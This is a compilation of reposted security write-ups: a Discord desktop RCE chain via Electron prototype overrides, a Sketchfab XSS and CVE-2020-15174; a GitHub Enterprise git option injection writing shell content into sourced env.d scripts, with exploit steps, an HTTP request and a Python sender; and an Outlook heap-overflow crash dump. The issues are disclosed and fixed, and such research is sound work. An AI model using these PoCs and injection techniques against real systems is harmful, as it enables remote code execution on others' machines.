Pentest-Report Ethereum Mist 11.2016 - 10.2017
https://drive.google.com/file/d/1LSsD9gzOejmQ2QipReyMXwr_M0Mg1GMH/view

You can also read the slides which I used at a CureCon event.

contextIsolation introduces separate contexts for the web page and the JavaScript code outside web pages, so that the JavaScript execution of one cannot affect the other. This is a necessary feature to eliminate the possibility of RCE, but it was disabled in Discord.

Now that I knew contextIsolation was disabled, I started looking for a place where I could execute arbitrary code by interfering with the JavaScript code outside web pages. Usually, when I create a PoC for RCE in Electron pentests, I first try to achieve RCE by using Electron's internal JavaScript code on the renderer. This is because Electron's internal JavaScript code on the renderer is present in any Electron app, so basically I can reuse the same code to achieve RCE, which is easy.

In my slides, I showed that RCE can be achieved by using the code which Electron executes at navigation time. It's not only possible from that code; such code exists in several places. (I'd like to publish examples of the PoC in the future.) However, depending on the Electron version used or the BrowserWindow options which are set, a PoC via Electron's code sometimes does not work well, because the code has been changed or the affected code can't be reached correctly. This time it did not work, so I decided to change the target to the preload scripts.

When checking the preload scripts, I found that Discord exposes a function to the web page which allows a set of allowed modules to be called via DiscordNative.nativeModules.requireModule('MODULE-NAME'). I couldn't use modules that lead to RCE directly, such as the child_process module, but I found code where RCE can be achieved by overriding JavaScript built-in methods and interfering with the execution of the exposed module.

The following is the PoC. I was able to confirm that the calc application pops up when I call the getGPUDriverVersions function, defined in the module called "discord_utils", from devTools while overriding RegExp.prototype.test and Array.prototype.join.
RegExp.prototype.test = function() {
    return false;
}
Array.prototype.join = function() {
    return "calc";
}
DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions();

The getGPUDriverVersions function tries to execute the program by using the "execa" library, like the following:

module.exports.getGPUDriverVersions = async () => {
  if (process.platform !== 'win32') {
    return {};
  }

  const result = {};
  const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`;
  try {
    result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, []));
  } catch (e) {
    result.nvidia = {error: e.toString()};
  }

  return result;
};

Usually execa tries to execute "nvidia-smi.exe", which is specified in the nvidiaSmiPath variable; however, due to the overridden RegExp.prototype.test and Array.prototype.join, the argument is replaced with "calc" in execa's internal processing. Specifically, the argument is replaced by changing the following two parts:

https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36
https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55

The remaining work was to find a way to execute JavaScript in the application. If I could find that, it would lead to actual RCE.

XSS in iframe embeds

As explained above, I had found that RCE could happen from arbitrary JavaScript execution, so I was trying to find an XSS vulnerability. The app supports autolinks and Markdown, but those looked fine, so I turned my attention to the iframe embeds feature. iframe embeds is the feature which, for example, automatically displays a video player in the chat when a YouTube URL is posted.

When a URL is posted, Discord tries to fetch the OGP information of that URL and, if there is OGP information, it displays the page's title, description, thumbnail image, associated video and so on in the chat. Discord extracts the video URL from the OGP information, and only if that URL belongs to an allowed domain and actually has the URL format of an embeds page is it embedded in an iframe.

I couldn't find documentation about which services can be embedded in an iframe, so I tried to get a hint by checking the CSP's frame-src directive. At that time, the following CSP was used:

Content-Security-Policy: [...] ; frame-src https://*.youtube.com https://*.twitch.tv https://open.spotify.com https://w.soundcloud.com https://sketchfab.com https://player.vimeo.com https://www.funimation.com https://twitter.com https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ https://js.stripe.com https://assets.braintreegateway.com https://checkout.paypal.com https://*.watchanimeattheoffice.com

Obviously, some of these are listed to allow iframe embeds (e.g. YouTube, Twitch, Spotify). I checked whether each URL could be embedded in the iframe by specifying the domain in the OGP information one by one, and tried to find XSS on the embeddable domains. After some attempts, I found that sketchfab.com, one of the domains listed in the CSP, can be embedded in the iframe, and I found an XSS on its embeds page. I didn't know about Sketchfab at that time, but it seems to be a platform where users can publish, buy and sell 3D models. There was a simple DOM-based XSS in the footnote of a 3D model.

The following is the PoC, which has the crafted OGP.
When I posted this URL to the chat, Sketchfab was embedded into the iframe in the chat, and after a few clicks on the iframe, arbitrary JavaScript was executed.

https://l0.cm/discord_rce_og.html

<head>
  <meta charset="utf-8">
  <meta property="og:title" content="RCE DEMO">
  [...]
  <meta property="og:video:url" content="https://sketchfab.com/models/2b198209466d43328169d2d14a4392bb/embed">
  <meta property="og:video:type" content="text/html">
  <meta property="og:video:width" content="1280">
  <meta property="og:video:height" content="720">
</head>

Okay, I had finally found an XSS, but the JavaScript still executes inside the iframe. Since Electron doesn't load the "JavaScript code outside web pages" into the iframe, even if I override the JavaScript built-in methods in the iframe, I can't interfere with the critical Node.js parts. To achieve RCE, we need to get out of the iframe and execute JavaScript in a top-level browsing context. This requires opening a new window from the iframe or navigating the top window to another URL from the iframe.

I checked the related code and found code that restricts navigation by using the "new-window" and "will-navigate" events in the main process:

mainWindow.webContents.on('new-window', (e, windowURL, frameName, disposition, options) => {
  e.preventDefault();
  if (frameName.startsWith(DISCORD_NAMESPACE) && windowURL.startsWith(WEBAPP_ENDPOINT)) {
    popoutWindows.openOrFocusWindow(e, windowURL, frameName, options);
  } else {
    _electron.shell.openExternal(windowURL);
  }
});

[...]

mainWindow.webContents.on('will-navigate', (evt, url) => {
  if (!insideAuthFlow && !url.startsWith(WEBAPP_ENDPOINT)) {
    evt.preventDefault();
  }
});

I thought this code could correctly prevent users from opening a new window or navigating the top window. However, I noticed unexpected behavior.

Navigation restriction bypass (CVE-2020-15174)

I thought the code was okay, but I tried anyway to check that top navigation from the iframe is blocked. Then, surprisingly, the navigation was not blocked for some reason. I expected the attempt to be caught by the "will-navigate" event before the navigation happens and refused by preventDefault(), but it was not.

To test this behavior, I created a small Electron app, and I found that the "will-navigate" event is, for some reason, not emitted for a top navigation started from an iframe. To be exact, if the top's origin and the iframe's origin are the same origin, the event is emitted, but if they are different origins, it is not. I didn't think there was a legitimate reason for this behavior, so I considered it an Electron bug and decided to report it to the Electron team later.

With the help of this bug, I was able to bypass the navigation restriction. The last thing I had to do was navigate to the page containing the RCE code by using the iframe's XSS, like top.location="//l0.cm/discord_calc.html". In this way, by combining the three bugs, I was able to achieve RCE, as shown in the video below.

In the end

These issues were reported through Discord's Bug Bounty Program. First, the Discord team disabled the Sketchfab embeds and applied a workaround to prevent navigation from the iframe by adding the sandbox attribute to it. After a while, contextIsolation was enabled. Now, even if arbitrary JavaScript could be executed in the app, RCE does not occur via overridden JavaScript built-in methods. I received $5,000 as a reward for this discovery.
The XSS on Sketchfab was reported through Sketchfab's Bug Bounty Program and was quickly fixed by the Sketchfab developers. I received $300 as a reward for this discovery.

The bug in the "will-navigate" event was reported to Electron's security team and was fixed as the following vulnerability (CVE-2020-15174):

Unpreventable top-level navigation · Advisory · electron/electron
https://github.com/electron/electron/security/advisories/GHSA-2q4g-w47c-4674

That's it. Personally, I like that bugs unrelated to the app's own implementation (a bug in an external page and a bug in Electron) led to RCE. I hope this article helps you keep your Electron apps secure. Thanks for reading!

Posted by Masato Kinugawa

Sursa: https://mksben.l0.cm/2020/10/discord-desktop-rce.html
22. GitHub - RCE via git option injection (almost) - $20,000 Bounty
Oct 18, 2020

It had been a while since I'd looked into GitHub, so I thought it would be good to spin up a fresh enterprise trial and see what I could find. The GHE code is obfuscated, but only to discourage customers from messing around, and if you do a bit of googling there are lots of scripts available to decode it, leaving you with regular Ruby files for a Rails app.

The last bug I submitted to GitHub was around a year ago. It was about injecting options into the git command using branch names that started with a -, allowing an attacker to truncate files on the server, so I decided that was a good place to start and see whether any similar bugs had been introduced.

Discovery

I began searching for all the places where the git process was called, then tracing the arguments back to see if they were user controllable and if they were sanitised correctly. Most places either put user-controlled data behind -- in the command so that it is never parsed as an option, or checked that the value is a valid sha1 or commitish and doesn't start with a -.

After a while I came across a method reverse_diff which took two commits and ended up running a git diff-tree with them, and the only check was that they were both valid git references for the repo (sha, branch, tag, etc). Tracing backwards, this function was called by a revert_range method which was used when reverting between two previous wiki commits. So a POST to user/repo/wiki/Home/_revert/57f931f8839c99500c17a148c6aae0ee69ded004/1967827bcd890246b746a5387340356d0ac7710a would end up calling reverse_diff with the values 57f931f8839c99500c17a148c6aae0ee69ded004 and 1967827bcd890246b746a5387340356d0ac7710a.

This looked perfect! I checked out a repo and pushed a new branch called --help with git push origin master:--help, then tried to post to user/repo/wiki/Home/_revert/HEAD/--help. But instead of success, a 422 Unprocessable Entity was returned. Looking at the server logs, it was complaining that the CSRF token was invalid. It turns out that Rails now has per-form CSRF tokens that are generated based on the path that you are posting to. Query parameters aren't checked, but in this case the route was set up to only allow path params for the commits.

The form for the revert, along with the valid token, was generated by the wiki compare template, but unfortunately that had a much stricter validation and required the commits to be valid sha hashes. This meant that I couldn't get it to render a valid form and token for the --help branch, only for valid commit shas.

Digging into the valid_authenticity_token? method in Rails, another way to bypass the per-form CSRF check is by using the global token, as there is a code path to keep existing forms backwards compatible while transitioning:

def valid_authenticity_token?(session, encoded_masked_token) # :doc:
  if encoded_masked_token.nil? || encoded_masked_token.empty? || !encoded_masked_token.is_a?(String)
    return false
  end

  begin
    masked_token = Base64.strict_decode64(encoded_masked_token)
  rescue ArgumentError # encoded_masked_token is invalid Base64
    return false
  end

  # See if it's actually a masked token or not. In order to
  # deploy this code, we should be able to handle any unmasked
  # tokens that we've issued without error.
  if masked_token.length == AUTHENTICITY_TOKEN_LENGTH
    # This is actually an unmasked token. This is expected if
    # you have just upgraded to masked tokens, but should stop
    # happening shortly after installing this gem.
    compare_with_real_token masked_token, session
  elsif masked_token.length == AUTHENTICITY_TOKEN_LENGTH * 2
    csrf_token = unmask_token(masked_token)
    compare_with_real_token(csrf_token, session) || valid_per_form_csrf_token?(csrf_token, session)
  else
    false # Token is malformed.
  end
end

The global CSRF token is quite often handed out to the client using the csrf_meta_tags helper, but GitHub had really locked down everything, and after a lot of searching there was no place that I could find that was leaking it. GitHub had even gone so far as raising an error if the per-form CSRF was not set up correctly, as that could leak the global token.

I spent quite a bit of time searching for a way to bypass this; because of the way the token is generated by Rails, it didn't really matter where the form was created as long as I could get it to use a path such as wiki/Home/_revert/HEAD/--help. After a lot of searching and digging very deep within both GHE and Rails code, I came up empty handed. I did find a few archived HTML pages on github.com indicating that the global token used to be handed out, just not any more. GitHub stores the global CSRF token for a user session in the database, so I decided to just grab it from there, continue on, and come back to how to obtain it later.

Exploit

I installed and ran execsnoop from perf-tools on the GHE server to have a closer look at the exact git command that was run when doing a revert, and saw that it was in the form git diff-tree -p -R commit1 commit2 -- Home.md. The diff-tree git command has an option --output allowing you to write the output to a file instead of printing the results, so using HEAD as the first commit and --output=/tmp/ggg as the second would write the latest diff of a file to /tmp/ggg.

So I pushed a new branch called --output=/tmp/ggg to the wiki repo, then did a POST to user/repo/wiki/Home/_revert/HEAD/--output%3D%2Ftmp%2Fggg using the authenticity_token I'd grabbed from the database. Looking on the server, the file /tmp/ggg had been created with the output of the diff!

9ea5ef1f10e9ff1974055d3e4a60bec143822f9d
diff --git b/Home.md a/Home.md
index c3a38e1..85402bc 100644
--- b/Home.md
+++ a/Home.md
@@ -1,4 +1,3 @@
 Welcome to the public wiki!
-3
+2

The next thing to do was to work out what to do with it. The file could be written anywhere the git user had access to, and the content at the end of the file was fairly controllable. After a lot more searching, I found a few writeable env.d directories (such as /data/github/shared/env.d) which contained some setup scripts. The files in these directories ended up being sourced when the services started up or when some commands were run:

for i in $envdir/*.sh; do
  if [ -r $i ]; then
    . $i
  fi
done

Since doing a . script.sh doesn't require the file to be executable, and bash will continue running a script after it encounters errors, this meant that if the diff that was written contained some valid shell script then it would be executed! So now I had everything (kind of) that was required to exploit the bug.
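To make the injection pattern (and the kind of check GitHub uses elsewhere) concrete, here is a minimal Python sketch of the idea. The function names and the full-sha validation are hypothetical illustrations, not GitHub's actual Ruby code; the git command line mirrors the one captured with execsnoop above.

import re
import subprocess

def reverse_diff_unsafe(repo, ref1, ref2, page):
    # ref1/ref2 come straight from the URL; a "ref" such as --output=/tmp/ggg
    # appears before the "--" and is therefore parsed by git as an option.
    cmd = ["git", "-C", repo, "diff-tree", "-p", "-R", ref1, ref2, "--", page]
    return subprocess.run(cmd, capture_output=True, text=True).stdout

FULL_SHA = re.compile(r"\A[0-9a-f]{40}\Z")

def reverse_diff_safe(repo, ref1, ref2, page):
    # The usual mitigation: require a full sha (or at least reject anything
    # starting with "-") before the value can reach the command line.
    for ref in (ref1, ref2):
        if ref.startswith("-") or not FULL_SHA.match(ref):
            raise ValueError("refusing ref that could be parsed as an option: %r" % ref)
    cmd = ["git", "-C", repo, "diff-tree", "-p", "-R", ref1, ref2, "--", page]
    return subprocess.run(cmd, capture_output=True, text=True).stdout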
1. Grab a user's CSRF token from the database
2. Create a wiki page containing ; echo vakzz was here > /tmp/ggg
3. Edit the wiki page and add a new line of text: # anything
4. Clone the wiki repo
5. Push a new branch name with our injected flag: git push origin master:--output=/data/failbotd/shared/env.d/00-run.sh
6. Use Burp or curl to post to user/repo/wiki/Home/_revert/HEAD/--output%3D%2Fdata%2Ffailbotd%2Fshared%2Fenv%2Ed%2F00-run%2Esh using the authenticity_token from the database (a scripted version of this request is sketched at the end of this section):

POST /user/repo/wiki/Home/_revert/HEAD/--output%3D%2Fdata%2Ffailbotd%2Fshared%2Fenv%2Ed%2F00-run%2Esh HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: user_session=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Content-Length: 65

authenticity_token=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3d

7. Check the server to see that the file has been created with our diff:

$ cat /data/failbotd/shared/env.d/00-run.sh
69eb12b5e9969ec73a9e01a67555c089bcf0fc36
diff --git b/Home.md a/Home.md
index 4a7b77c..ce38b05 100644
--- b/Home.md
+++ a/Home.md
@@ -1,2 +1 @@
-; echo vakzz was here > /tmp/ggg`
-# anything
\ No newline at end of file
+; echo vakzz was here > /tmp/ggg`
\ No newline at end of file

8. Run the file that sources our diff and check that it worked:

./production.sh
./production.sh: 1: /data/failbotd/current/.app-config/env.d/00-run.sh: 69eb12b5e9969ec73a9e01a67555c089bcf0fc36: not found
diff: unrecognized option '--git'
diff: Try 'diff --help' for more information.
./production.sh: 3: /data/failbotd/current/.app-config/env.d/00-run.sh: index: not found
./production.sh: 4: /data/failbotd/current/.app-config/env.d/00-run.sh: ---: not found
./production.sh: 5: /data/failbotd/current/.app-config/env.d/00-run.sh: +++: not found
./production.sh: 6: /data/failbotd/current/.app-config/env.d/00-run.sh: @@: not found
./production.sh: 7: /data/failbotd/current/.app-config/env.d/00-run.sh: -: not found
./production.sh: 2: /data/failbotd/current/.app-config/env.d/00-run.sh: -#: not found
./production.sh: 3: /data/failbotd/current/.app-config/env.d/00-run.sh: No: not found
./production.sh: 4: /data/failbotd/current/.app-config/env.d/00-run.sh: +: not found
./production.sh: 11: /data/failbotd/current/.app-config/env.d/00-run.sh: No: not found

$ cat /tmp/ggg
vakzz was here

At this stage I decided to report the issue to GitHub, even though I had no way to bypass the per-form CSRF token. The underlying issue was still pretty critical, and it's possible that GitHub could release a patch in the future that accidentally leaked the global token, or change the route to accept query parameters, which would open them up to being vulnerable.

Within 15 minutes GitHub had triaged the bug and let me know that they were looking into it. A few hours later they responded again, confirming the underlying issue and that they could not find a way to bypass the per-form token, mentioning that it was a severe issue and that they may have just been lucky with their CSRF setup. I sent through a summary of the methods I'd tried for bypassing the per-form token as well as potential spots where it might be possible to leak it, and confirmed that I thought it was pretty unlikely to be exploitable.

So the bug itself was critical, but without it being exploitable I really had no idea how GitHub was going to land when deciding on a bounty, or even if there would be a bounty at all. I ended up being very pleasantly surprised.
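As promised in step 6, here is roughly how that request could be scripted instead of being sent with Burp or curl. This is a hypothetical helper; the path, cookie and token values are placeholders just as in the write-up, and verify=False is only an assumption about a GHE test instance using a self-signed certificate.

import urllib.parse
import requests

def post_revert(base_url, branch, user_session, authenticity_token):
    # e.g. branch = "--output=/data/failbotd/shared/env.d/00-run.sh"
    path = "/user/repo/wiki/Home/_revert/HEAD/" + urllib.parse.quote(branch, safe="")
    return requests.post(
        base_url + path,
        data={"authenticity_token": authenticity_token},
        cookies={"user_session": user_session},
        verify=False,  # assumption: self-signed cert on the test instance
    )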
Timeline

July 25, 2020 01:48:02 AEST - Bug submitted via HackerOne
July 25, 2020 02:05:21 AEST - Bug was triaged by GitHub
July 25, 2020 09:18:28 AEST - Underlying issue was confirmed
August 11, 2020 - GitHub Enterprise 2.21.4 released fixing the issue:

High: An attacker could inject a malicious argument into a Git sub-command when executed on GitHub Enterprise Server. This could allow an attacker to overwrite arbitrary files with partially user-controlled content and potentially execute arbitrary commands on the GitHub Enterprise Server instance. To exploit this vulnerability, an attacker would need permission to access repositories within the GHES instance. However, due to other protections in place, we could not identify a way to actively exploit this vulnerability. This vulnerability was reported through the GitHub Security Bug Bounty program.

September 11, 2020 02:52:15 AEST - $20,000 bounty awarded

Sursa: https://devcraft.io/2020/10/18/github-rce-git-inject.html
23. CVE-2020-16947

This vulnerability occurs in Outlook 2019 (16.0.13231.20262) installed on Windows 10 1909 x64.

TL;DR: I found this bug using the winafl fuzzer. The bug occurs when parsing HTML content. If an attacker successfully executes this exploit, it can lead to remote command execution.

Details

0:000> r
rax=0000000000000000 rbx=0000021c99ce9eb0 rcx=0000021c99ce9eb0
rdx=00000046c07f8a30 rsi=0000021cc85ac000 rdi=00000000ffffe000
rip=00007ffe69012f5b rsp=00000046c07f89f0 rbp=00000046c07f8a69
 r8=00000046c07f8a28  r9=0000000000000041 r10=00007de1cf5e3124
r11=0000000000000000 r12=00000046c07f8b00 r13=0000021c99ce9f1c
r14=0000000000000041 r15=00000000000003b5
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
OLMAPI32!HrGetMessageClassFromContentClassW+0xf80b:
00007ffe`69012f5b 448836 mov byte ptr [rsi],r14b ds:0000021c`c85ac000=??

0:000> d rsi - 10
0000021c`c85abff0 ff fd ff fd ff fd ff fd-ff fd ff fd ff fd ff 41 ...............A
0000021c`c85ac000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0000021c`c85ac010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0000021c`c85ac020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0000021c`c85ac030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0000021c`c85ac040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0000021c`c85ac050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0000021c`c85ac060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????

0:000> !heap -p -a rsi
address 0000021cc85ac000 found in
_DPH_HEAP_ROOT @ 21ce0331000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
                     21ccb3eb000: 21cc85a7ff0 4010 - 21cc85a7000 6000
00007ffea238825b ntdll!RtlDebugAllocateHeap+0x000000000000003b
00007ffea22a9745 ntdll!RtlpAllocateHeap+0x00000000000000f5
00007ffea22a73d4 ntdll!RtlpAllocateHeapInternal+0x00000000000006d4
00007ffe68c8777d OLMAPI32!MAPIAllocateBuffer+0x00000000000000cd
00007ffe69012a35 OLMAPI32!HrGetMessageClassFromContentClassW+0x000000000000f2e5
00007ffe69015d34 OLMAPI32!HrTextFromCompressedRTFStreamEx+0x00000000000023d4
00007ffe68dcc776 OLMAPI32!RTFSyncCpid+0x0000000000000156
00007ffe7c3eb532 exsec32!HrExsec32Initialize+0x0000000000005372
00007ffe7c3e5631 exsec32+0x0000000000005631
00007ffe68dccc76 OLMAPI32!RTFSyncCpid+0x0000000000000656
00007ffe68de2ab4 OLMAPI32!HrCreateMHTMLConverter+0x0000000000002634
00007ffe68dd21a7 OLMAPI32!MlangIsConvertible+0x0000000000004a07
00007ffe68de299d OLMAPI32!HrCreateMHTMLConverter+0x000000000000251d
00007ffe7c42748f exsec32!DllUnregisterServer+0x00000000000002bf
00007ffe7c3eb418 exsec32!HrExsec32Initialize+0x0000000000005258
00007ffe7c3e5631 exsec32+0x0000000000005631
00007ffe551703d9 OUTLMIME!MimeOleInetDateToFileTime+0x0000000000025539
00007ffe551709f9 OUTLMIME!MimeOleInetDateToFileTime+0x0000000000025b59
00007ffe55174dec OUTLMIME!MimeOleInetDateToFileTime+0x0000000000029f4c
00007ffe55175279 OUTLMIME!MimeOleInetDateToFileTime+0x000000000002a3d9
00007ffe55174ebe OUTLMIME!MimeOleInetDateToFileTime+0x000000000002a01e
00007ffe7c41a8fc exsec32!HrMaxAlgStrength+0x0000000000004cac
00007ffe7c3eb017 exsec32!HrExsec32Initialize+0x0000000000004e57
00007ffe7c3ebf23 exsec32!HrExsec32Initialize+0x0000000000005d63
00007ffe49ac9f47 mso98win32client!Ordinal3621+0x00000000000000e7
00007ffe49ac9ecd mso98win32client!Ordinal3621+0x000000000000006d
00007ff7afc43f79 outlook!FEnableAMapProgress+0x000000000002f099
00007ff7afdb638d outlook!UpdateSharingAccounts+0x000000000007031d
00007ff7afdc3d85 outlook!IsOutlookOutsideWinMain+0x0000000000003af5
00007ff7afcf7727 outlook!HrGetDelegatorInfoSync+0x00000000000016e7
00007ff7afd2a2b0 outlook!GetOutlookSafeModeState+0x000000000000bd00
00007ff7afd2a14b outlook!GetOutlookSafeModeState+0x000000000000bb9b

When strings outside the ASCII range are copied from the HTML content, each such character is replaced with 0xfffd. As a result, the size of the copied string doubles, so even though the src buffer and dst buffer have the same size, a buffer overflow occurs.

Sursa: https://github.com/0neb1n/CVE-2020-16947
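To picture the size mismatch described in this item, here is a rough Python model based on my reading of the description and the memory dump above (single bytes for ASCII, the two-byte 0xFFFD replacement for everything else). It is only an illustration of the arithmetic, not Outlook's actual conversion code, and the sample input is hypothetical.

def converted_size(src: bytes) -> int:
    # every byte outside the ASCII range becomes the 2-byte replacement
    # character 0xFFFD (seen as the repeating "ff fd" pattern in the dump)
    return sum(1 if b < 0x80 else 2 for b in src)

src = b"<html>" + b"\xff" * 0x40   # hypothetical HTML with non-ASCII bytes
allocated = len(src)               # dst buffer sized like the source buffer
needed = converted_size(src)
print(needed - allocated, "bytes would be written past the allocation")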